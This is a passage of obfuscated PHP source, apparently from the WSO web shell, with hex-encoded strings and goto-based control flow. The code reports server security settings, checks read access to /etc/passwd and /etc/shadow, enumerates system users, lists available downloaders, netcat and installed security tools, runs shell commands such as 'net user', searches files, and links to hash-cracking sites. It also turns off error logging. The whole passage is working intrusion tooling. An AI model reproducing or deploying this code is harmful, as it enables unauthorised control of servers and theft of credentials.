@ini_get(
"\x73\141\x66\x65\x5f\155\x6f\144\145\137\145\x78\145\x63\137\144\151\162"
)
);
goto V6Pow;
o51U2:
wsoSecParam(
"\117\160\x65\156\40\142\x61\x73\145\x20\144\151\162",
@ini_get("\157\160\145\x6e\x5f\142\x61\163\x65\144\x69\162")
);
goto giF29;
m3Zin:
wsoSecParam(
"\104\x69\x73\x61\x62\x6c\x65\x64\40\x50\x48\120\x20\106\165\x6e\x63\164\151\157\x6e\x73",
$GLOBALS[
"\x64\x69\x73\x61\142\154\145\137\x66\165\156\x63\164\x69\x6f\156\x73"
]
? $GLOBALS[
"\x64\x69\x73\x61\x62\154\145\x5f\146\165\156\143\x74\x69\157\x6e\x73"
]
: "\x6e\157\156\145"
);
goto o51U2;
owg70:
if (function_exists("\x6f\143\151\x5f\143\x6f\156\156\x65\143\164")) {
$temp[] = "\117\162\x61\x63\154\x65";
}
goto DQ0Hi;
I0L0t:
if (
function_exists(
"\x6d\171\x73\161\154\137\147\x65\x74\x5f\143\154\x69\145\x6e\164\x5f\x69\156\146\157"
)
) {
$temp[] =
"\115\x79\x53\x71\x6c\40\50" . mysqli_get_client_info() . "\x29";
}
goto T3sY7;
T3sY7:
if (
function_exists("\x6d\x73\x73\161\x6c\137\143\157\x6e\156\x65\x63\164")
) {
$temp[] = "\115\x53\123\121\x4c";
}
goto oKr71;
Kcf2h:
echo "\x3c\150\61\76\123\145\x72\x76\145\x72\40\163\x65\143\x75\162\x69\x74\x79\40\151\x6e\146\157\162\155\141\164\x69\x6f\156\74\x2f\x68\x31\x3e\x3c\144\151\166\x20\143\154\141\163\x73\75\143\157\x6e\164\145\156\164\76";
goto deosI;
GSa9X:
echo "\74\x62\162\x3e";
goto Ppg7_;
zA3JJ:
wsoSecParam(
"\123\x65\x72\166\145\x72\40\x73\x6f\146\x74\167\x61\162\145",
@getenv("\123\x45\x52\126\x45\122\137\x53\117\106\124\x57\x41\x52\x45")
);
goto aO8HS;
IbU7m:
echo "\74\57\x64\151\166\x3e";
goto XTIFZ;
XTIFZ:
wsoFooter();
goto jAziO;
V6Pow:
wsoSecParam(
"\x53\x61\x66\x65\x20\155\157\x64\x65\x20\151\156\x63\x6c\x75\144\x65\x20\x64\x69\162",
@ini_get(
"\x73\141\x66\145\x5f\155\157\144\145\x5f\151\x6e\143\154\165\x64\145\137\x64\x69\162"
)
);
goto qT_UQ;
zEzgM:
$temp = [];
goto I0L0t;
DQ0Hi:
wsoSecParam(
"\x53\x75\160\160\157\x72\164\145\144\x20\x64\x61\x74\x61\x62\x61\163\145\x73",
implode("\x2c\x20", $temp)
);
goto GSa9X;
Ppg7_:
if ($GLOBALS["\157\x73"] == "\156\x69\x78") {
goto yzksH;
Pr2du:
if (!$GLOBALS["\163\x61\x66\145\137\155\x6f\144\x65"]) {
goto tBdFD;
b1GnC:
wsoSecParam(
"\125\163\x65\x72\x66\x75\154",
implode("\x2c\40", $temp)
);
goto gsw3Q;
IArV4:
$temp = [];
goto bo6ds;
SphFn:
wsoSecParam(
"\110\157\x73\164\163",
@file_get_contents("\x2f\145\x74\x63\57\x68\x6f\163\x74\x73")
);
goto dOgcI;
bo6ds:
foreach ($userful as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto b1GnC;
VXdNV:
wsoSecParam("\104\x61\x6e\147\145\162", implode("\x2c\40", $temp));
goto xDJbP;
tBdFD:
$userful = [
"\147\143\x63",
"\154\x63\x63",
"\143\143",
"\154\144",
"\155\x61\x6b\x65",
"\160\150\160",
"\x70\145\162\154",
"\160\x79\164\x68\x6f\x6e",
"\162\x75\x62\x79",
"\164\141\x72",
"\x67\x7a\x69\160",
"\142\x7a\x69\160",
"\142\172\x69\160\62",
"\x6e\x63",
"\154\x6f\x63\x61\x74\x65",
"\163\x75\x69\144\x70\x65\x72\154",
];
goto j1mm2;
zL0U4:
foreach ($danger as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto VXdNV;
F15O4:
echo "\74\x62\162\x2f\x3e";
goto vzm5g;
gsw3Q:
$temp = [];
goto zL0U4;
AYbzB:
wsoSecParam(
"\x44\157\167\x6e\154\157\x61\144\145\x72\163",
implode("\54\x20", $temp)
);
goto F15O4;
M0R0C:
$downloaders = [
"\x77\147\145\164",
"\146\145\164\x63\x68",
"\154\171\156\x78",
"\x6c\151\x6e\x6b\x73",
"\143\165\x72\154",
"\x67\x65\164",
"\x6c\167\x70\x2d\x6d\x69\162\x72\157\x72",
];
goto nuthD;
dOgcI:
echo "\x3c\x62\x72\x2f\76\74\x73\160\x61\x6e\x3e\160\157\163\151\x78\x5f\147\145\x74\160\x77\x75\x69\144\x20\50\x22\x52\145\x61\x64\42\40\x2f\145\x74\x63\x2f\160\141\163\163\167\x64\51\74\57\x73\x70\141\x6e\x3e\74\164\x61\142\154\x65\x3e\x3c\x66\x6f\162\155\x20\157\x6e\163\165\x62\155\x69\164\x3d\x27\147\50\156\x75\154\154\54\156\x75\x6c\154\x2c\42\x35\x22\x2c\x74\x68\x69\x73\x2e\x70\141\162\141\155\x31\56\x76\x61\154\165\x65\x2c\164\150\151\163\x2e\x70\x61\x72\x61\155\62\56\166\141\x6c\165\145\x29\73\x72\x65\164\165\x72\x6e\40\146\141\154\163\x65\73\x27\76\x3c\164\x72\x3e\74\164\144\76\x46\162\157\x6d\x3c\x2f\164\x64\76\74\x74\x64\x3e\74\x69\x6e\160\x75\164\x20\x74\171\160\145\x3d\164\x65\170\x74\40\156\x61\155\145\75\160\141\162\141\x6d\x31\x20\x76\x61\154\165\x65\x3d\x30\x3e\74\57\x74\144\x3e\x3c\57\164\x72\x3e\74\x74\162\x3e\x3c\164\144\76\x54\157\74\x2f\x74\x64\x3e\x3c\164\x64\76\74\x69\x6e\160\165\x74\40\164\x79\160\145\x3d\164\x65\170\164\x20\x6e\x61\155\145\x3d\160\141\x72\141\x6d\x32\x20\166\x61\x6c\x75\145\75\x31\60\60\x30\76\74\x2f\164\x64\76\x3c\57\164\162\x3e\x3c\57\164\x61\x62\x6c\145\x3e\74\x69\x6e\x70\165\x74\x20\x74\x79\x70\x65\x3d\x73\x75\142\155\x69\x74\x20\x76\141\154\x75\145\x3d\x22\76\x3e\42\x3e\x3c\57\x66\x6f\x72\x6d\x3e";
goto Fh4yv;
Fh4yv:
if (
isset($_POST["\160\62"], $_POST["\x70\x33"]) &&
is_numeric($_POST["\x70\62"]) &&
is_numeric($_POST["\x70\x33"])
) {
goto TMVUA;
Aagop:
wsoSecParam("\x55\163\145\162\163", $temp);
goto H4g4C;
TMVUA:
$temp = "";
goto g4wsK;
yuLqo:
echo "\x3c\142\x72\x2f\x3e";
goto Aagop;
g4wsK:
for (
;
$_POST["\160\x32"] <= $_POST["\x70\63"];
$_POST["\160\x32"]++
) {
$uid = @posix_getpwuid($_POST["\160\x32"]);
if ($uid) {
$temp .= join("\x3a", $uid) . "\12";
}
}
goto yuLqo;
H4g4C:
}
goto GP22b;
vzm5g:
wsoSecParam(
"\x48\104\104\40\163\160\x61\143\x65",
wsoEx("\144\x66\40\55\x68")
);
goto SphFn;
j1mm2:
$danger = [
"\153\x61\166",
"\156\157\144\x33\x32",
"\142\144\143\x6f\x72\x65\144",
"\x75\x76\x73\x63\141\x6e",
"\163\x61\x76",
"\144\x72\x77\145\142\x64",
"\x63\x6c\141\x6d\144",
"\x72\153\x68\165\x6e\164\145\162",
"\143\150\x6b\162\x6f\157\x74\x6b\x69\164",
"\x69\x70\164\141\142\x6c\145\x73",
"\151\x70\x66\x77",
"\164\x72\151\x70\x77\x69\162\145",
"\163\x68\151\145\x6c\x64\143\143",
"\160\157\x72\164\163\145\x6e\164\x72\x79",
"\163\156\x6f\162\164",
"\157\x73\163\145\x63",
"\x6c\151\144\163\x61\x64\155",
"\x74\143\x70\154\x6f\x64\147",
"\163\x78\x69\144",
"\154\157\147\x63\x68\x65\143\x6b",
"\x6c\157\147\167\141\164\143\150",
"\163\x79\x73\x6d\x61\x73\x6b",
"\x7a\155\142\x73\x63\x61\160",
"\163\141\x77\x6d\x69\x6c\x6c",
"\167\157\162\x6d\x73\x63\x61\x6e",
"\156\x69\x6e\x6a\x61",
];
goto M0R0C;
xDJbP:
$temp = [];
goto pSd_M;
pSd_M:
foreach ($downloaders as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto AYbzB;
nuthD:
echo "\x3c\142\162\76";
goto IArV4;
GP22b:
}
goto QDcOt;
yzksH:
wsoSecParam(
"\122\145\x61\x64\x61\x62\x6c\145\x20\x2f\x65\164\x63\x2f\x70\x61\x73\163\x77\x64",
@is_readable("\x2f\x65\x74\x63\57\160\x61\x73\163\x77\x64")
? "\x79\x65\163\x20\74\141\40\x68\162\145\146\75\47\43\47\x20\157\156\143\x6c\151\143\x6b\75\x27\147\50\x22\106\x69\154\x65\x73\124\157\x6f\x6c\x73\42\54\40\x22\57\145\164\143\x2f\x22\x2c\x20\42\160\x61\163\x73\167\144\x22\x29\47\x3e\x5b\166\x69\x65\167\135\74\x2f\141\x3e"
: "\156\x6f"
);
goto ledym;
ESH98:
wsoSecParam(
"\117\123\40\x76\x65\x72\x73\x69\x6f\156",
@file_get_contents(
"\x2f\x70\x72\x6f\x63\57\166\x65\162\163\x69\x6f\156"
)
);
goto ZLZ7x;
ZLZ7x:
wsoSecParam(
"\104\x69\163\164\x72\x20\x6e\x61\x6d\145",
@file_get_contents(
"\x2f\x65\164\x63\57\x69\x73\163\165\x65\x2e\156\145\164"
)
);
goto Pr2du;
ledym:
wsoSecParam(
"\x52\x65\141\144\141\142\x6c\x65\x20\57\145\x74\x63\x2f\163\x68\141\x64\x6f\x77",
@is_readable("\57\x65\164\143\57\x73\150\x61\144\157\x77")
? "\x79\145\163\x20\x3c\x61\x20\150\162\145\x66\x3d\47\43\x27\x20\x6f\x6e\x63\154\x69\x63\153\x3d\47\147\50\42\x46\151\x6c\145\163\x54\157\x6f\154\x73\42\x2c\40\42\x2f\x65\x74\x63\x2f\42\x2c\x20\42\x73\x68\141\x64\x6f\167\x22\x29\47\76\x5b\166\x69\145\x77\x5d\74\x2f\141\76"
: "\x6e\x6f"
);
goto ESH98;
QDcOt:
} else {
goto NsBCo;
Me9Q1:
wsoSecParam(
"\101\x63\x63\x6f\165\156\164\x20\123\145\x74\164\151\156\x67\163",
wsoEx("\x6e\x65\164\x20\141\143\x63\x6f\x75\x6e\x74\163")
);
goto RXCoL;
NsBCo:
wsoSecParam(
"\117\123\x20\126\145\x72\x73\151\x6f\x6e",
wsoEx("\166\x65\162")
);
goto Me9Q1;
RXCoL:
wsoSecParam(
"\125\x73\145\162\x20\101\x63\x63\x6f\x75\156\x74\163",
wsoEx("\x6e\145\164\40\x75\x73\145\162")
);
goto DnuxL;
DnuxL:
}
goto IbU7m;
wqp98:
wsoHeader();
goto Kcf2h;
aO8HS:
if (
function_exists(
"\x61\160\141\143\x68\x65\137\x67\145\164\x5f\155\157\x64\165\x6c\145\x73"
)
) {
wsoSecParam(
"\114\x6f\141\144\x65\x64\x20\x41\x70\x61\143\150\x65\40\x6d\x6f\144\x75\x6c\x65\163",
implode("\x2c\x20", apache_get_modules())
);
}
goto m3Zin;
deosI:
function wsoSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "\74\163\x70\x61\156\76" .
$n .
"\72\40\x3c\x2f\163\160\x61\x6e\76";
if (strpos($v, "\12") === false) {
echo $v . "\74\x62\x72\76";
} else {
echo "\74\x70\162\145\x20\143\154\x61\x73\x73\x3d\155\154\61\76" .
$v .
"\74\x2f\x70\x72\145\76";
}
}
}
goto zA3JJ;
jAziO:
}
goto oHsYW;
qljle:
if ($cwd[strlen($cwd) - 1] != "\x2f") {
$cwd .= "\x2f";
}
goto j4eIF;
g7ZCc:
@ini_set("\154\x6f\147\x5f\145\x72\x72\157\x72\x73", 0);
goto ABTpd;
XeOpc:
if (
!function_exists(
"\x70\157\163\151\x78\137\x67\145\x74\160\167\x75\x69\144"
) &&
strpos(
$GLOBALS[
"\x64\151\163\141\142\x6c\145\137\146\x75\x6e\x63\164\x69\157\156\163"
],
"\x70\x6f\163\151\x78\137\147\145\164\x70\x77\x75\x69\x64"
) === false
) {
function posix_getpwuid($p)
{
return false;
}
}
goto lUvYe;
KC9ar:
function actionStringTools()
{
goto MBvsT;
S0req:
if (empty($_POST["\141\x6a\x61\170"]) && !empty($_POST["\x70\x31"])) {
WSOsetcookie(
md5($_SERVER["\x48\124\124\x50\137\110\x4f\x53\124"]) .
"\141\x6a\x61\170",
0
);
}
goto nYBgB;
Oymko:
if (!function_exists("\150\x65\170\62\x61\x73\143\151\x69")) {
function hex2ascii($p)
{
goto uM0Pu;
NG1dD:
return $r;
goto fKGDN;
uM0Pu:
$r = "";
goto ac1Yo;
ac1Yo:
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
goto NG1dD;
fKGDN:
}
}
goto ZMcUd;
vUNKP:
echo "\x3c\x2f\163\x65\154\x65\143\164\x3e\74\x69\x6e\160\165\164\40\x74\x79\160\x65\x3d\x27\163\165\x62\155\151\164\x27\x20\166\x61\154\x75\145\75\47\x3e\76\47\x2f\x3e\x20\74\x69\x6e\160\x75\164\40\164\x79\x70\145\75\x63\x68\x65\143\x6b\x62\157\170\40\x6e\x61\x6d\x65\x3d\141\152\141\x78\40\166\141\x6c\165\x65\75\x31\x20" .
(@$_COOKIE[
md5($_SERVER["\x48\124\x54\x50\x5f\x48\x4f\x53\x54"]) .
"\x61\x6a\141\170"
]
? "\143\x68\x65\143\153\145\x64"
: "") .
"\x3e\x20\x73\145\156\144\40\165\163\x69\x6e\147\x20\101\112\101\x58\x3c\142\x72\x3e\74\164\x65\x78\164\141\162\145\141\x20\x6e\141\x6d\145\75\x27\151\x6e\160\165\164\47\40\163\164\171\x6c\145\x3d\x27\155\x61\x72\x67\151\156\x2d\164\x6f\160\x3a\65\x70\x78\47\40\x63\154\x61\163\163\x3d\x62\151\147\141\x72\x65\141\76" .
(empty($_POST["\160\x31"])
? ""
: htmlspecialchars(@$_POST["\x70\x32"])) .
"\x3c\x2f\164\145\170\164\x61\162\145\141\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\74\160\162\145\40\x63\x6c\x61\x73\163\75\x27\x6d\x6c\61\47\40\x73\164\171\154\x65\x3d\47" .
(empty($_POST["\160\x31"])
? "\x64\151\163\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\73"
: "") .
"\155\x61\162\x67\151\156\x2d\164\x6f\x70\72\x35\x70\x78\x27\x20\151\144\x3d\47\163\164\x72\117\165\x74\160\165\x74\x27\x3e";
goto k5nqW;
ZMcUd:
if (!function_exists("\141\x73\x63\x69\x69\x32\x68\145\170")) {
function ascii2hex($p)
{
goto cdb2T;
O0tgA:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf("\x25\60\62\130", ord($p[$i]));
}
goto JVXpM;
cdb2T:
$r = "";
goto O0tgA;
JVXpM:
return strtoupper($r);
goto I6jbu;
I6jbu:
}
}
goto q2kmv;
HYxD9:
echo "\x3c\x68\x31\76\123\164\162\151\x6e\x67\x20\x63\x6f\x6e\166\x65\x72\x73\151\157\x6e\x73\x3c\x2f\150\x31\x3e\74\x64\151\166\x20\x63\154\141\163\163\x3d\x63\157\156\164\145\156\164\76";
goto OX44o;
awjDW:
function wsoRecursiveGlob($path)
{
goto TkAHe;
lEFZ5:
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
wsoRecursiveGlob($item);
}
} else {
if (
empty($_POST["\x70\62"]) ||
@strpos(file_get_contents($item), $_POST["\160\62"]) !==
false
) {
echo "\x3c\x61\x20\x68\x72\145\146\x3d\x27\43\47\40\157\156\x63\154\x69\143\153\75\x27\x67\x28\x22\x46\151\x6c\x65\x73\124\157\157\154\163\x22\x2c\156\165\x6c\154\x2c\42" .
urlencode($item) .
"\x22\x2c\40\42\x76\x69\145\x77\42\x2c\42\42\51\x27\x3e" .
htmlspecialchars($item) .
"\x3c\57\x61\x3e\74\142\x72\76";
}
}
}
}
goto fVCol;
GUM3F:
$paths = @array_unique(
@array_merge(
@glob($path . $_POST["\160\63"]),
@glob($path . "\x2a", GLOB_ONLYDIR)
)
);
goto lEFZ5;
TkAHe:
if (substr($path, -1) != "\57") {
$path .= "\x2f";
}
goto GUM3F;
fVCol:
}
goto qLbIZ;
aUced:
if (!function_exists("\142\151\x6e\x68\x65\170")) {
function binhex($p)
{
return dechex(bindec($p));
}
}
goto Oymko;
MBvsT:
if (!function_exists("\150\145\x78\62\x62\x69\x6e")) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
goto aUced;
q2kmv:
if (
!function_exists(
"\x66\x75\154\154\x5f\x75\162\x6c\x65\156\143\x6f\x64\x65"
)
) {
function full_urlencode($p)
{
goto d1_DN;
d1_DN:
$r = "";
goto D3iJl;
YAXHC:
return strtoupper($r);
goto wfgBE;
D3iJl:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= "\45" . dechex(ord($p[$i]));
}
goto YAXHC;
wfgBE:
}
}
goto IHtdM;
N3xOi:
if (isset($_POST["\141\x6a\141\170"])) {
goto V2x0a;
Wm5Kx:
exit();
goto IafqZ;
x5Jd7:
if (in_array($_POST["\x70\x31"], $stringTools)) {
echo $_POST["\x70\x31"]($_POST["\x70\62"]);
}
goto vD3zd;
vD3zd:
$temp =
"\x64\x6f\143\x75\155\x65\156\x74\x2e\x67\145\x74\x45\x6c\x65\155\x65\x6e\164\102\171\x49\144\50\x27\x73\164\162\x4f\165\164\x70\x75\164\x27\51\x2e\x73\x74\x79\154\x65\56\144\x69\x73\160\x6c\x61\x79\75\x27\x27\x3b\144\x6f\143\x75\155\x65\156\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\145\x6e\x74\x42\171\x49\x64\50\x27\163\164\x72\117\x75\164\x70\x75\164\47\x29\x2e\151\156\156\x65\162\x48\124\115\x4c\x3d\x27" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"\12\xd\x9\x5c\x27\x0"
) .
"\x27\x3b\xa";
goto NED_K;
V2x0a:
WSOsetcookie(
md5($_SERVER["\x48\124\124\x50\137\110\x4f\123\x54"]) .
"\141\x6a\x61\170",
true
);
goto LTDt0;
LTDt0:
ob_start();
goto x5Jd7;
NED_K:
echo strlen($temp), "\12", $temp;
goto Wm5Kx;
IafqZ:
}
goto S0req;
nYBgB:
wsoHeader();
goto HYxD9;
k5nqW:
if (!empty($_POST["\x70\x31"])) {
if (in_array($_POST["\160\x31"], $stringTools)) {
echo htmlspecialchars($_POST["\x70\x31"]($_POST["\160\x32"]));
}
}
goto jZzWZ;
OX44o:
echo "\74\146\157\x72\x6d\40\x6e\x61\155\x65\x3d\47\164\157\x6f\x6c\x73\106\x6f\162\155\47\40\x6f\156\x53\165\x62\x6d\x69\x74\x3d\47\151\146\x28\x74\x68\x69\163\56\x61\152\x61\170\x2e\x63\150\145\x63\x6b\x65\x64\51\x7b\141\x28\156\165\x6c\x6c\54\156\165\x6c\x6c\x2c\164\x68\x69\x73\x2e\x73\x65\x6c\x65\143\x74\x54\x6f\157\154\x2e\166\141\154\x75\145\x2c\x74\x68\151\163\x2e\151\x6e\160\165\164\56\166\141\x6c\165\145\51\73\x7d\x65\x6c\163\145\173\x67\x28\x6e\165\x6c\154\54\x6e\x75\154\154\54\x74\150\151\x73\x2e\x73\x65\x6c\x65\143\164\x54\x6f\157\x6c\x2e\166\x61\x6c\x75\x65\54\x74\150\x69\163\x2e\151\x6e\160\165\x74\56\x76\141\x6c\165\145\x29\x3b\x7d\x20\x72\x65\x74\165\x72\x6e\40\146\x61\154\163\145\73\47\76\74\x73\x65\154\145\143\164\40\156\x61\x6d\145\75\47\163\145\154\x65\143\164\x54\157\157\154\47\x3e";
goto BBAR5;
Rfc53:
wsoFooter();
goto JMM51;
uWngZ:
echo "\74\x2f\144\151\x76\76\x3c\x62\x72\76\x3c\150\61\x3e\x53\145\141\162\x63\x68\x20\146\x6f\162\x20\150\x61\163\150\x3a\74\x2f\150\61\76\x3c\144\151\x76\40\143\154\141\163\x73\75\x63\157\x6e\x74\x65\156\x74\x3e\xd\xa\11\x9\74\146\x6f\162\x6d\40\x6d\x65\x74\x68\157\144\x3d\47\x70\x6f\163\164\x27\40\164\141\x72\x67\x65\x74\x3d\x27\x5f\142\x6c\141\156\153\x27\x20\156\141\155\145\x3d\47\x68\146\47\76\15\xa\11\x9\x9\74\x69\156\160\165\164\x20\x74\171\x70\145\75\47\164\145\x78\164\47\40\156\x61\x6d\145\x3d\47\x68\x61\x73\150\x27\40\163\x74\171\x6c\x65\x3d\x27\x77\x69\144\x74\150\72\x32\x30\60\x70\170\73\x27\76\74\x62\162\76\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\74\151\x6e\x70\165\x74\40\164\x79\160\145\x3d\x27\150\x69\x64\x64\x65\156\47\x20\156\141\155\145\x3d\x27\141\143\x74\47\x20\166\141\154\165\x65\x3d\47\x66\151\156\x64\47\x2f\x3e\15\12\x9\11\11\74\x69\x6e\160\x75\x74\x20\164\171\160\x65\x3d\47\142\165\x74\164\x6f\156\x27\40\x76\x61\x6c\x75\x65\75\47\150\141\163\150\x63\162\x61\143\x6b\x69\x6e\147\x2e\x72\165\47\40\x6f\x6e\x63\154\151\x63\153\x3d\42\x64\x6f\143\165\155\x65\156\x74\x2e\x68\146\x2e\141\x63\164\151\x6f\x6e\x3d\x27\x68\164\x74\x70\163\72\x2f\57\x68\141\163\150\143\x72\x61\143\153\x69\156\x67\56\x72\x75\x2f\151\x6e\144\x65\170\x2e\x70\x68\x70\47\x3b\x64\x6f\143\165\x6d\x65\x6e\x74\56\x68\x66\x2e\x73\165\x62\155\151\x74\x28\x29\42\76\x3c\142\162\x3e\15\12\11\x9\11\74\x69\x6e\x70\x75\x74\40\x74\171\160\x65\x3d\x27\142\165\x74\x74\157\156\x27\40\166\141\x6c\165\145\75\47\x6d\144\x35\56\x72\145\x64\156\x6f\151\172\x65\56\143\x6f\155\x27\40\157\x6e\x63\x6c\151\143\153\75\x22\x64\x6f\143\x75\155\x65\156\x74\56\x68\x66\56\141\143\164\151\x6f\x6e\75\x27\150\x74\164\160\x3a\x2f\57\x6d\x64\65\56\162\145\144\x6e\x6f\x69\x7a\x65\x2e\143\x6f\155\57\x3f\161\75\x27\53\x64\157\x63\165\155\x65\156\x74\56\x68\x66\56\x68\x61\x73\x68\56\x76\141\154\x75\x65\53\x27\x26\163\x3d\155\144\65\47\x3b\144\157\x63\x75\155\x65\156\164\x2e\150\x66\56\x73\165\x62\155\x69\164\x28\51\x22\76\x3c\142\x72\x3e\15\xa\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x3c\x69\156\x70\165\x74\x20\x74\171\160\x65\x3d\47\142\165\x74\164\x6f\156\47\x20\166\141\x6c\165\145\75\x27\143\162\x61\x63\x6b\x66\157\x72\x2e\x6d\145\x27\40\157\x6e\x63\154\x69\143\x6b\x3d\42\x64\x6f\x63\x75\x6d\145\156\x74\56\x68\146\56\141\x63\164\151\157\156\75\47\x68\x74\164\x70\72\x2f\57\143\x72\141\x63\153\146\157\162\x2e\x6d\x65\x2f\x69\x6e\144\x65\170\x2e\x70\x68\160\47\73\x64\157\143\x75\x6d\145\156\x74\56\150\146\x2e\x73\165\x62\x6d\x69\x74\x28\51\x22\76\74\x62\162\x3e\15\12\x9\11\x3c\57\146\157\x72\x6d\x3e\x3c\x2f\x64\151\166\76";
goto Rfc53;
BBAR5:
foreach ($stringTools as $k => $v) {
echo "\x3c\157\160\x74\x69\157\x6e\x20\x76\141\x6c\x75\145\75\x27" .
htmlspecialchars($v) .
"\47\x3e" .
$k .
"\x3c\x2f\x6f\160\164\x69\x6f\156\76";
}
goto vUNKP;
qLbIZ:
if (@$_POST["\160\x33"]) {
wsoRecursiveGlob($_POST["\x63"]);
}
goto uWngZ;
jZzWZ:
echo "\74\57\160\162\x65\x3e\x3c\57\x64\x69\x76\x3e\74\x62\x72\76\74\150\x31\76\x53\145\x61\162\x63\x68\x20\x66\151\x6c\x65\x73\72\74\57\150\x31\x3e\74\144\151\x76\x20\143\154\x61\x73\x73\x3d\143\157\x6e\164\145\x6e\164\x3e\xd\12\x9\11\x3c\146\157\162\155\x20\x6f\x6e\x73\x75\x62\155\151\164\75\x22\x67\50\x6e\165\x6c\154\x2c\164\x68\x69\163\x2e\x63\x77\144\x2e\x76\141\x6c\165\145\54\x6e\x75\154\x6c\54\x74\150\151\x73\x2e\164\x65\x78\164\56\x76\141\154\165\x65\x2c\x74\x68\151\x73\x2e\146\x69\154\145\x6e\141\155\x65\x2e\166\x61\x6c\165\x65\x29\73\x72\145\164\x75\162\x6e\40\146\141\154\x73\145\73\x22\76\74\164\141\142\x6c\x65\x20\x63\145\x6c\154\160\x61\144\x64\151\156\147\x3d\x27\x31\x27\40\143\145\x6c\x6c\x73\160\x61\x63\151\156\147\75\x27\x30\47\x20\x77\151\144\x74\150\75\47\x35\60\x25\x27\76\xd\12\11\11\x9\74\x74\162\x3e\x3c\x74\144\40\167\x69\x64\x74\150\x3d\47\61\45\47\x3e\124\145\170\x74\72\x3c\57\164\x64\x3e\74\164\144\76\74\151\156\x70\x75\x74\40\164\x79\x70\145\x3d\47\x74\145\x78\x74\47\x20\x6e\141\155\x65\75\x27\x74\x65\x78\164\x27\40\x73\164\171\154\145\x3d\47\x77\x69\144\164\150\72\61\x30\x30\x25\47\x3e\74\57\x74\x64\x3e\74\57\x74\162\x3e\xd\xa\x9\x9\11\x3c\164\162\76\74\164\x64\76\x50\141\164\150\x3a\74\57\x74\144\76\74\x74\x64\76\x3c\151\156\x70\x75\164\40\164\x79\x70\145\75\x27\164\x65\x78\164\47\x20\x6e\141\155\145\x3d\47\143\x77\x64\47\40\x76\141\154\x75\145\75\x27" .
htmlspecialchars($GLOBALS["\x63\x77\144"]) .
"\47\x20\163\164\x79\x6c\x65\75\x27\167\x69\x64\x74\x68\72\61\x30\x30\x25\47\76\74\x2f\164\x64\76\x3c\x2f\x74\x72\76\xd\xa\11\11\11\74\x74\x72\x3e\x3c\164\144\76\116\x61\x6d\145\72\x3c\57\164\x64\x3e\74\x74\144\76\74\x69\156\x70\x75\x74\40\x74\171\x70\x65\75\47\164\x65\x78\x74\47\x20\156\141\155\145\75\x27\x66\151\x6c\x65\156\x61\x6d\x65\x27\40\166\141\154\x75\x65\75\47\52\47\40\x73\x74\x79\x6c\145\75\47\167\151\x64\x74\150\72\x31\60\60\45\47\76\74\57\x74\144\x3e\74\57\x74\x72\x3e\15\xa\x9\11\11\x3c\x74\162\76\x3c\164\x64\76\74\x2f\164\144\76\x3c\x74\x64\76\74\x69\156\160\165\x74\x20\164\171\160\145\75\47\x73\165\x62\155\151\164\x27\40\x76\141\x6c\x75\x65\x3d\47\x3e\x3e\x27\76\74\x2f\x74\144\76\74\57\164\162\76\xd\xa\11\x9\11\74\57\x74\141\x62\154\x65\76\74\57\146\x6f\162\155\76";
goto awjDW;
IHtdM:
$stringTools = [
"\x42\141\163\145\66\x34\40\145\x6e\143\157\144\x65" =>
"\142\141\x73\145\x36\x34\137\145\x6e\x63\157\x64\x65",
"\x42\x61\x73\145\x36\x34\x20\x64\x65\143\157\x64\x65" =>
"\142\x61\x73\x65\66\x34\x5f\x64\145\143\x6f\144\x65",
"\125\x72\x6c\x20\145\x6e\x63\157\x64\x65" =>
"\165\x72\x6c\x65\156\x63\157\144\145",
"\x55\162\154\x20\144\145\x63\157\x64\x65" =>
"\x75\162\154\144\145\143\157\144\145",
"\x46\165\x6c\154\40\x75\162\x6c\x65\156\x63\157\x64\145" =>
"\146\x75\154\x6c\137\165\x72\x6c\x65\x6e\x63\157\x64\x65",
"\x6d\x64\65\40\150\141\163\x68" => "\x6d\x64\65",
"\163\x68\x61\61\x20\x68\x61\x73\x68" => "\x73\150\141\61",
"\143\162\171\x70\x74" => "\143\x72\x79\x70\x74",
"\x43\x52\x43\x33\62" => "\x63\162\x63\63\x32",
"\x41\123\103\x49\111\40\x74\157\x20\110\x45\130" =>
"\141\163\143\151\x69\62\150\x65\170",
"\110\x45\130\40\x74\x6f\x20\x41\x53\x43\x49\x49" =>
"\x68\145\170\x32\141\x73\143\151\151",
"\x48\x45\130\40\x74\x6f\40\x44\105\x43" => "\x68\145\x78\144\x65\x63",
"\x48\x45\x58\40\x74\157\40\102\111\x4e" =>
"\150\145\x78\x32\142\151\156",
"\x44\x45\x43\40\164\157\x20\x48\105\x58" => "\x64\x65\143\150\145\x78",
"\104\x45\103\x20\164\x6f\40\x42\x49\x4e" => "\x64\145\x63\142\151\x6e",
"\102\x49\116\40\164\157\40\x48\105\x58" => "\142\x69\x6e\150\145\170",
"\x42\111\x4e\x20\x74\157\x20\x44\x45\103" =>
"\x62\151\x6e\144\145\x63",
"\123\164\x72\x69\156\147\x20\164\x6f\x20\154\x6f\x77\145\162\40\143\x61\x73\145" =>
"\x73\x74\162\164\x6f\x6c\x6f\x77\x65\x72",
"\x53\164\x72\x69\156\x67\40\164\x6f\40\x75\160\160\x65\162\x20\143\141\163\x65" =>
"\x73\164\162\164\x6f\165\160\x70\x65\x72",
"\110\x74\155\x6c\163\x70\145\x63\x69\141\154\143\150\141\162\163" =>
"\150\x74\155\154\163\x70\x65\143\151\x61\154\x63\150\x61\x72\163",
"\123\x74\x72\151\156\x67\40\154\x65\156\x67\x74\x68" =>
"\163\x74\162\154\145\x6e",
];
goto N3xOi;
JMM51:
}
goto xB4MH;
sO9OV:
$cwd = @getcwd();
goto cUzsD;
SG2I5:
function WSOstripslashes($array)
{
return is_array($array)
